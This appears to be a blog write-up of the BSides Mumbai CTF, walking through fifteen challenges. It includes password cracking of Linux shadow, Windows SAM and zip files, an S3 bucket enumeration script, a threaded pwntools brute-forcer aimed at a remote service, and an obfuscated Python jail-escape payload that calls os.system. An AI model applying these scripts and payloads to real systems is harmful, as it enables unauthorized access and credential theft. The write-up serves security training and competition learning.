Post

Bsides Mumbai CTF

Posted
Preview Image
By Veer Mehta 3 min read

BSides Mumbai CTF

Challenge 1: Feedback Bonus

Just a feedback Form

Challenge 2: Welcome

Untitled

Direct flag given in source code.

The left png file was corrupted so we fix the header as given:

89 50 4E 47 → Magic Bytes for PNG

Untitled

Untitled

Untitled

Challenge 3: Vadapaooo

In this challenge we get a corrupted jpg file, lets inspect it in a hexeditor and try to fix the image.

We have to insert 3 bytes ahead of the file and add the magic bytes FF D8 F8

Untitled

Now using stegseek we can extract the hidden password and exe file

Untitled

Untitled

Challenge 4 : Sanity Check

Simple flag, it was there in the discord browse channels

Untitled

Untitled

Challenge 5 : Shadow Realm

Untitled

In this challenge we were given 2 files i.e passwd and shadow files. These are linux password files where every username and password is stored.

Untitled

In this shadow file we can see the pattern $y$ this indicates it is a yescrypt cipher. We can now use unshadow and then run johntheripper to crack the password

Untitled

flag{spongebob} → Has been found

Challenge 6: Data Breach

On initial analysis of the given files, we can see that the zip file is password protected and we have been given a bunch of other files.

Untitled

I now checked the authors of the docs using exiftool

Untitled

The usernames were weird so i decided to extract all the usernames and use it as a wordlist to crack the zip file.

1

exiftool -a * | grep "Creator" | awk '{print $3}'

Untitled

We then used zip2john to convert it to a john hash format

Untitled

flag{Ch@rlotte}

Challenge 7: Common

Login, as admin:admin in ctfd Flag would be found in access tokens, its deleted now

Untitled

Challenge 8: Potential APT

We got 2 files, SAM and System files, these pertain to windows credential storage, with 2 files we can extract the NTLM hashes of the users on the machine

Untitled

We save these to a file and use crackstation to check for cracked hashes of littlemermaid.

Untitled

Challenge 9: Many Doc

Untitled

Out of these files, message.docx was not opening for me normally so i decided to inspect it with binwalk

Untitled

I can see vba script lets inspect it further for macros attacks.

VBAproject.bin was an interesting binary file and i found a base64 string in it

Untitled

Untitled

Challenge 10: Rabbit Holes

Unfortunately i had deleted the file but doing strings and grepping will give you the flag

Challenge 11: FindMe

Packetwhisperer from defcon was used to encrypt data in DNS traffic

Untitled

Using mode 3 cloudfront prefixes in random subdomains, we can get the flag extracted.

Untitled

https://github.com/TryCatchHCF/PacketWhisper

Challenge 12: BabyPass

/FLAG endpoint bypasses /flag filter

Untitled

Challenge 13: A Bucket load of samosa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

import requests

# Load the custom dictionary
url = "https://naughtydev-company-files.s3.eu-central-1.amazonaws.com/naughtydev-bucketnames.txt"
response = requests.get(url)
dictionary = response.text.splitlines()

# Check the buckets
for word in dictionary:
    bucket_name = f"{word}.naughtyide.s3.amazonaws.com"
    print(bucket_name)
    bucket_url = f"http://{bucket_name}"
    response = requests.get(bucket_url)
    if response.status_code == 200:
        print(f"Bucket found: {bucket_url}")
        print(response.text)

This code, enumerates all the buckets based on the pattern.

Untitled

http://social.naughtyide.s3.amazonaws.com

Untitled

Challenge 14: Lottery

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

import concurrent.futures
from pwn import *

context.log_level = 'info'

def find_number_combination(io):
    io.sendlineafter(b"lottery?", b"-1")

    for a in range(1, 10):
        for b in range(1, 10):
            for c in range(1, 10):
                for d in range(1, 10):
                    for e in range(1, 10):
                        res = io.recvuntil("spaces:")
                        if not b"Try again" in res and not b"number 1" in res:
                            print(res)
                            return

                        io.sendline(f"{a} {b} {c} {d} {e}")

def runit():
    io = remote("143.110.176.49", 1024)
    find_number_combination(io)

# Number of workers you want to use
num_workers = 100

# Using ThreadPoolExecutor to parallelize the function
with concurrent.futures.ThreadPoolExecutor(max_workers=num_workers) as executor:
    # List of your functions to be executed in parallel
    futures = [executor.submit(runit) for _ in range(num_workers)]

    # Getting results if your functions return something
    results = [future.result() for future in futures]

Made this code to bruteforce the code using concurrent threads.

Untitled

Challenge 15: Jail Shell

I wont lie but i took reference from this writeup as the chall was similar

https://github.com/nikosChalk/ctf-writeups/blob/master/uiuctf22/jail/a-horse-with-no-names/README.md

1
2

(lambda:__builtins__.__import__(open.__name__.__getitem__(0).__add__(set.__name__.__getitem__(0))).system(chr.__name__.__getitem__(0).__add__(abs.__name__.__getitem__(0)).__add__(type.__name__.__getitem__(0)).__add__(str(hash).__getitem__(9)).__add__(float.__name__.__getitem__(0)).__add__(list.__name__.__getitem__(0)).__add__(abs.__name__.__getitem__(0)).__add__(globals.__name__.__getitem__(0)).__add__(hash.__doc__.__getitem__(151)).__add__(type.__name__.__getitem__(0)).__add__(hex.__name__.__getitem__(2)).__add__(type.__name__.__getitem__(0))))()
CTF
CTF cybersecurity
This post is licensed under CC BY 4.0 by the author.